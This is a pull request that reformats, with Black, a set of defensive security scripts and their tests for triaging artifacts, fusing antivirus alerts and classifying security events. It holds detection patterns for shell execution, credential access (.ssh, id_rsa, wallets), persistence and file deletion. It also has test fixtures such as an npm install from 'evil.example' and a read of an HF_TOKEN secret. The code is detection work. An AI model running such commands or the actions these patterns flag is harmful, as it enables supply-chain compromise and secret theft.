### PR TITLE
style(security): format signal fusion layer

### DIFF
--- a/scripts/security/artifact_triage.py
+++ b/scripts/security/artifact_triage.py
@@ -36,13 +36,38 @@ SECRET_PATTERNS = [
 
 INDICATOR_RULES: list[tuple[str, str, int, re.Pattern[str]]] = [
     ("dynamic_code_execution", "CRITICAL", 28, re.compile(r"\b(eval|exec)\s*\(|base64\.b64decode|Function\s*\(", re.I)),
-    ("shell_execution", "HIGH", 20, re.compile(r"\b(os\.system|subprocess\.Popen|subprocess\.run|child_process|powershell|cmd\.exe)\b", re.I)),
+    (
+        "shell_execution",
+        "HIGH",
+        20,
+        re.compile(r"\b(os\.system|subprocess\.Popen|subprocess\.run|child_process|powershell|cmd\.exe)\b", re.I),
+    ),
     ("network_callback", "HIGH", 18, re.compile(r"https?://|socket\.connect|requests\.(post|put)|fetch\s*\(", re.I)),
-    ("persistence_terms", "HIGH", 16, re.compile(r"\b(run key|startup|schtasks|launch agent|registry|crontab)\b", re.I)),
-    ("credential_access_terms", "HIGH", 16, re.compile(r"\b(credentials?|keychain|browser cookies?|\.ssh|id_rsa|wallet)\b", re.I)),
-    ("filesystem_modification", "MEDIUM", 10, re.compile(r"\b(rm\s+-rf|unlink|deletefile|remove-item|writefile|open\s*\(.+['\"]w)\b", re.I)),
+    (
+        "persistence_terms",
+        "HIGH",
+        16,
+        re.compile(r"\b(run key|startup|schtasks|launch agent|registry|crontab)\b", re.I),
+    ),
+    (
+        "credential_access_terms",
+        "HIGH",
+        16,
+        re.compile(r"\b(credentials?|keychain|browser cookies?|\.ssh|id_rsa|wallet)\b", re.I),
+    ),
+    (
+        "filesystem_modification",
+        "MEDIUM",
+        10,
+        re.compile(r"\b(rm\s+-rf|unlink|deletefile|remove-item|writefile|open\s*\(.+['\"]w)\b", re.I),
+    ),
     ("obfuscation_markers", "MEDIUM", 10, re.compile(r"\b(fromcharcode|atob|packed|upx|xor|rot13)\b", re.I)),
-    ("debug_reverse_engineering_markers", "INFO", 2, re.compile(r"\b(strings|ghidra|ida|gdb|breakpoint|symbolic execution|angr)\b", re.I)),
+    (
+        "debug_reverse_engineering_markers",
+        "INFO",
+        2,
+        re.compile(r"\b(strings|ghidra|ida|gdb|breakpoint|symbolic execution|angr)\b", re.I),
+    ),
 ]
 
 

--- a/scripts/security/av_signal_fusion.py
+++ b/scripts/security/av_signal_fusion.py
@@ -239,7 +239,9 @@ def normalize_alert(raw: Any, *, provider_hint: str = "generic") -> NormalizedAl
         title = str(raw["rule"].get("description") or raw["rule"].get("id") or title)
     description = _first_text(raw, ("description", "output", "message", "full_log", "alert"))
     category = _first_text(raw, ("category", "type", "source", "detectionSource", "event_type")) or provider
-    artifact_path = _first_text(raw, ("artifact_path", "file_path", "filePath", "path", "target", "filename", "fileName"))
+    artifact_path = _first_text(
+        raw, ("artifact_path", "file_path", "filePath", "path", "target", "filename", "fileName")
+    )
     artifact_sha256 = _first_text(raw, ("sha256", "artifact_sha256", "hash"))
     if provider == "microsoft_defender":
         defender_path, defender_sha = _defender_artifact(raw)
@@ -326,13 +328,17 @@ def recommended_actions(
         "Do not execute referenced artifacts unless a sandboxed analysis step is explicitly approved.",
     ]
     if decision == "DENY":
-        actions.append("Block agent execution, CI promotion, and customer-facing deploy until a human clears the event.")
+        actions.append(
+            "Block agent execution, CI promotion, and customer-facing deploy until a human clears the event."
+        )
     elif decision == "QUARANTINE":
         actions.append("Route the task to isolated review and require provenance before merge or execution.")
     else:
         actions.append("Allow the workflow but keep the receipt attached to the agent/job record.")
     if any(a.provider in {"falco", "wazuh"} for a in alerts):
-        actions.append("If this came from runtime telemetry, compare against expected service behavior before suppressing.")
+        actions.append(
+            "If this came from runtime telemetry, compare against expected service behavior before suppressing."
+        )
     if artifact_report:
         actions.extend(artifact_report.get("recommended_next_steps", [])[:3])
     if event_report:

--- a/scripts/security/security_event_layers.py
+++ b/scripts/security/security_event_layers.py
@@ -112,7 +112,9 @@ def normalize_event(raw: Any) -> NormalizedSecurityEvent:
     action = _first(raw, ("action", "command", "method", "operation", "finish_reason", "decision"))
     target = _first(raw, ("target", "url", "host", "path", "file", "endpoint"))
     text = _first(raw, ("text", "prompt", "output", "content", "message", "body", "description", "command"))
-    metadata = {str(k): v for k, v in raw.items() if k not in {"text", "prompt", "output", "content", "message", "body"}}
+    metadata = {
+        str(k): v for k, v in raw.items() if k not in {"text", "prompt", "output", "content", "message", "body"}
+    }
     return NormalizedSecurityEvent(event_type, actor, action, target, text, metadata)
 
 
@@ -141,40 +143,97 @@ def classify_events(raw_events: list[Any], policy_path: Path = DEFAULT_POLICY_PA
         combined = " ".join([lower_text, lower_action, lower_target])
         scan = scan_text_for_threats(event.text)
         if scan.risk_score >= 0.85:
-            controls.append(EventHit("semantic_text_malicious", "CRITICAL", 35, "Prompt/output/log text matched malicious semantic controls."))
+            controls.append(
+                EventHit(
+                    "semantic_text_malicious",
+                    "CRITICAL",
+                    35,
+                    "Prompt/output/log text matched malicious semantic controls.",
+                )
+            )
         elif scan.risk_score >= 0.55:
-            controls.append(EventHit("semantic_text_suspicious", "HIGH", 22, "Prompt/output/log text matched suspicious semantic controls."))
+            controls.append(
+                EventHit(
+                    "semantic_text_suspicious",
+                    "HIGH",
+                    22,
+                    "Prompt/output/log text matched suspicious semantic controls.",
+                )
+            )
         elif scan.risk_score >= 0.25:
-            controls.append(EventHit("semantic_text_caution", "MEDIUM", 10, "Prompt/output/log text matched caution semantic controls."))
+            controls.append(
+                EventHit(
+                    "semantic_text_caution", "MEDIUM", 10, "Prompt/output/log text matched caution semantic controls."
+                )
+            )
 
         if any(pattern in combined for pattern in dangerous_commands):
-            controls.append(EventHit("dangerous_command", "CRITICAL", 42, "Command contains a known dangerous execution pattern."))
+            controls.append(
+                EventHit("dangerous_command", "CRITICAL", 42, "Command contains a known dangerous execution pattern.")
+            )
         if re.search(r"\b(subprocess|os\.system|child_process|exec|eval)\b", combined):
-            controls.append(EventHit("dynamic_execution_event", "HIGH", 18, "Event invokes dynamic command/code execution."))
+            controls.append(
+                EventHit("dynamic_execution_event", "HIGH", 18, "Event invokes dynamic command/code execution.")
+            )
         if any(command in combined for command in install_commands):
-            controls.append(EventHit("dependency_install_event", "MEDIUM", 10, "Event installs or runs dependency tooling."))
+            controls.append(
+                EventHit("dependency_install_event", "MEDIUM", 10, "Event installs or runs dependency tooling.")
+            )
         if re.search(r"--registry\s+https?://(?!registry\.npmjs\.org)|--index-url\s+https?://(?!pypi\.org)", combined):
-            controls.append(EventHit("non_default_package_registry", "HIGH", 24, "Dependency install uses a non-default package registry."))
+            controls.append(
+                EventHit(
+                    "non_default_package_registry",
+                    "HIGH",
+                    24,
+                    "Dependency install uses a non-default package registry.",
+                )
+            )
         if re.search(r"\b(--force|--legacy-peer-deps|--ignore-scripts|--trusted-host)\b", combined):
-            controls.append(EventHit("dependency_guardrail_override", "MEDIUM", 12, "Dependency command disables or weakens normal guardrails."))
+            controls.append(
+                EventHit(
+                    "dependency_guardrail_override",
+                    "MEDIUM",
+                    12,
+                    "Dependency command disables or weakens normal guardrails.",
+                )
+            )
 
         host = host_from_target(event.target)
         if host and host in blocked_hosts:
             controls.append(EventHit("blocked_host", "CRITICAL", 45, f"Target host is explicitly blocked: {host}"))
         elif host and host not in trusted_hosts and not host.endswith(".github.com"):
-            controls.append(EventHit("untrusted_network_target", "MEDIUM", 10, f"Target host is not in the trusted host policy: {host}"))
+            controls.append(
+                EventHit(
+                    "untrusted_network_target", "MEDIUM", 10, f"Target host is not in the trusted host policy: {host}"
+                )
+            )
 
         if any(marker in combined.upper() for marker in secret_markers):
-            controls.append(EventHit("secret_env_reference", "HIGH", 20, "Event references secret-looking environment material."))
+            controls.append(
+                EventHit("secret_env_reference", "HIGH", 20, "Event references secret-looking environment material.")
+            )
         if any(path in lower_target or path in combined for path in sensitive_paths):
-            controls.append(EventHit("sensitive_path_reference", "HIGH", 18, "Event references sensitive config/key material."))
+            controls.append(
+                EventHit("sensitive_path_reference", "HIGH", 18, "Event references sensitive config/key material.")
+            )
         if event.event_type.lower() in {"governed_output", "model_io", "chat"}:
             decision = str(event.metadata.get("decision") or event.action).upper()
             finish = str(event.metadata.get("finish_reason") or "").lower()
             if decision == "DENY" or finish == "content_filter":
-                controls.append(EventHit("governed_output_block", "CRITICAL", 40, "Governed-output surface blocked unsafe model/input behavior."))
+                controls.append(
+                    EventHit(
+                        "governed_output_block",
+                        "CRITICAL",
+                        40,
+                        "Governed-output surface blocked unsafe model/input behavior.",
+                    )
+                )
             elif decision in {"QUARANTINE", "ESCALATE"}:
-                controls.append(EventHit("governed_output_intervention", "HIGH", 18, "Governed-output surface required intervention."))
+                controls.append(
+                    EventHit(
+                        "governed_output_intervention", "HIGH", 18, "Governed-output surface required intervention."
+                    )
+                )
 
     score = max(0, sum(hit.weight for hit in controls))
     critical = any(hit.severity == "CRITICAL" for hit in controls)

--- a/scripts/security/traditional_security_layers.py
+++ b/scripts/security/traditional_security_layers.py
@@ -121,7 +121,9 @@ def _is_trusted_repo_path(path: Path, policy: dict[str, Any]) -> bool:
     return first in set(policy.get("trusted_repo_prefixes", []))
 
 
-def evaluate_artifact(path: Path, policy_path: Path = DEFAULT_POLICY_PATH, max_bytes: int = 5_000_000) -> TraditionalSecurityReport:
+def evaluate_artifact(
+    path: Path, policy_path: Path = DEFAULT_POLICY_PATH, max_bytes: int = 5_000_000
+) -> TraditionalSecurityReport:
     if not path.exists() or not path.is_file():
         raise FileNotFoundError(path)
     policy = load_policy(policy_path)
@@ -136,34 +138,52 @@ def evaluate_artifact(path: Path, policy_path: Path = DEFAULT_POLICY_PATH, max_b
     blocked = {str(item).lower() for item in policy.get("blocked_sha256", [])}
     allowed = {str(item).lower() for item in policy.get("allowed_sha256", [])}
     if digest.lower() in blocked:
-        controls.append(ControlHit("hash_reputation_block", "CRITICAL", 50, "SHA-256 is present in the local blocklist."))
+        controls.append(
+            ControlHit("hash_reputation_block", "CRITICAL", 50, "SHA-256 is present in the local blocklist.")
+        )
     if digest.lower() in allowed:
         controls.append(ControlHit("hash_reputation_allow", "INFO", -8, "SHA-256 is present in the local allowlist."))
 
     high_risk_ext = set(policy.get("high_risk_extensions", []))
     archive_ext = set(policy.get("archive_extensions", []))
     if ext in high_risk_ext:
-        controls.append(ControlHit("high_risk_extension", "HIGH", 18, f"Extension {ext} is executable or script-capable."))
+        controls.append(
+            ControlHit("high_risk_extension", "HIGH", 18, f"Extension {ext} is executable or script-capable.")
+        )
     if ext in archive_ext or kind == "zip_archive":
-        controls.append(ControlHit("archive_payload", "MEDIUM", 10, "Archive-like payload requires unpacking controls."))
+        controls.append(
+            ControlHit("archive_payload", "MEDIUM", 10, "Archive-like payload requires unpacking controls.")
+        )
     if EICAR_ASCII in scanned:
         controls.append(ControlHit("eicar_test_signature", "CRITICAL", 45, "EICAR antivirus test string detected."))
     if path.name.count(".") >= 2 and ext in high_risk_ext:
         controls.append(ControlHit("double_extension", "HIGH", 16, "High-risk double extension pattern."))
     if kind in {"pe_binary", "elf_binary"} and ext not in {".exe", ".dll", ".com", ".scr", ".so", ""}:
-        controls.append(ControlHit("magic_extension_mismatch", "HIGH", 18, f"Magic bytes show {kind} but extension is {ext or '<none>'}."))
+        controls.append(
+            ControlHit(
+                "magic_extension_mismatch", "HIGH", 18, f"Magic bytes show {kind} but extension is {ext or '<none>'}."
+            )
+        )
     if kind in {"pdf", "ole_document"} and b"/JavaScript" in scanned:
         controls.append(ControlHit("document_javascript", "HIGH", 18, "Document contains JavaScript marker."))
     if ent >= 7.2 and kind in {"pe_binary", "elf_binary", "unknown_binary"}:
-        controls.append(ControlHit("high_entropy_binary", "MEDIUM", 12, "Binary has high entropy; packed or encrypted content is possible."))
+        controls.append(
+            ControlHit(
+                "high_entropy_binary", "MEDIUM", 12, "Binary has high entropy; packed or encrypted content is possible."
+            )
+        )
     if path.stat().st_size > int(policy.get("max_review_size_bytes", 52_428_800)):
         controls.append(ControlHit("large_artifact", "MEDIUM", 8, "Artifact exceeds normal review size threshold."))
 
     rendered = str(path.resolve())
     if any(marker.lower() in rendered.lower() for marker in policy.get("untrusted_path_markers", [])):
-        controls.append(ControlHit("untrusted_path_zone", "MEDIUM", 8, "Artifact path is in a download/temp-style zone."))
+        controls.append(
+            ControlHit("untrusted_path_zone", "MEDIUM", 8, "Artifact path is in a download/temp-style zone.")
+        )
     elif _is_trusted_repo_path(path, policy):
-        controls.append(ControlHit("trusted_repo_path", "INFO", -4, "Artifact is under a configured repo source/test/docs path."))
+        controls.append(
+            ControlHit("trusted_repo_path", "INFO", -4, "Artifact is under a configured repo source/test/docs path.")
+        )
 
     score = max(0, sum(hit.weight for hit in controls))
     critical = any(hit.severity == "CRITICAL" for hit in controls)

--- a/tests/security/test_av_signal_fusion.py
+++ b/tests/security/test_av_signal_fusion.py
@@ -117,7 +117,9 @@ def test_security_events_participate_in_fusion_decision() -> None:
 
 def test_cli_writes_receipt_and_returns_warn_for_quarantine(tmp_path: Path) -> None:
     signals = tmp_path / "signals.jsonl"
-    signals.write_text(json.dumps({"priority": "Warning", "rule": "Unexpected outbound connection"}) + "\n", encoding="utf-8")
+    signals.write_text(
+        json.dumps({"priority": "Warning", "rule": "Unexpected outbound connection"}) + "\n", encoding="utf-8"
+    )
     out_dir = tmp_path / "out"
 
     result = subprocess.run(

--- a/tests/security/test_security_event_layers.py
+++ b/tests/security/test_security_event_layers.py
@@ -57,7 +57,9 @@ def test_dependency_install_non_default_registry_quarantines() -> None:
 
 def test_secret_environment_reference_quarantines() -> None:
     layer = _load_module()
-    report = layer.classify_events([{"event_type": "env", "text": "read HF_TOKEN from config/connector_oauth/.env.connector.oauth"}])
+    report = layer.classify_events(
+        [{"event_type": "env", "text": "read HF_TOKEN from config/connector_oauth/.env.connector.oauth"}]
+    )
 
     assert report.decision in {"QUARANTINE", "DENY"}
     controls = {hit.control for hit in report.controls}
@@ -67,7 +69,10 @@ def test_secret_environment_reference_quarantines() -> None:
 
 def test_cli_writes_security_event_receipt(tmp_path: Path) -> None:
     events = tmp_path / "events.jsonl"
-    events.write_text(json.dumps({"event_type": "command", "command": "npm install leftpad --registry https://evil.example"}) + "\n", encoding="utf-8")
+    events.write_text(
+        json.dumps({"event_type": "command", "command": "npm install leftpad --registry https://evil.example"}) + "\n",
+        encoding="utf-8",
+    )
     out_dir = tmp_path / "out"
 
     result = subprocess.run(

--- a/tests/security/test_traditional_security_layers.py
+++ b/tests/security/test_traditional_security_layers.py
@@ -9,6 +9,7 @@ from pathlib import Path
 REPO_ROOT = Path(__file__).resolve().parents[2]
 SCRIPT = REPO_ROOT / "scripts" / "security" / "traditional_security_layers.py"
 
+
 def _load_module():
     spec = importlib.util.spec_from_file_location("_traditional_security_layers", SCRIPT)
     assert spec is not None and spec.loader is not None


### PR DESCRIPTION
## Summary
- apply Black formatting to the security signal-fusion layer merged in #1751
- no behavior changes

## Verification
- python -m pytest tests\security\test_artifact_triage.py tests\security\test_av_signal_fusion.py tests\security\test_security_event_layers.py tests\security\test_traditional_security_layers.py -q -> 23 passed
- python -m black --check --line-length 120 scripts\security\artifact_triage.py scripts\security\av_signal_fusion.py scripts\security\security_event_layers.py scripts\security\traditional_security_layers.py tests\security\test_artifact_triage.py tests\security\test_av_signal_fusion.py tests\security\test_security_event_layers.py tests\security\test_traditional_security_layers.py -> passed
- git diff --check -> passed

## Rollback
- Revert this PR to restore the pre-format layout.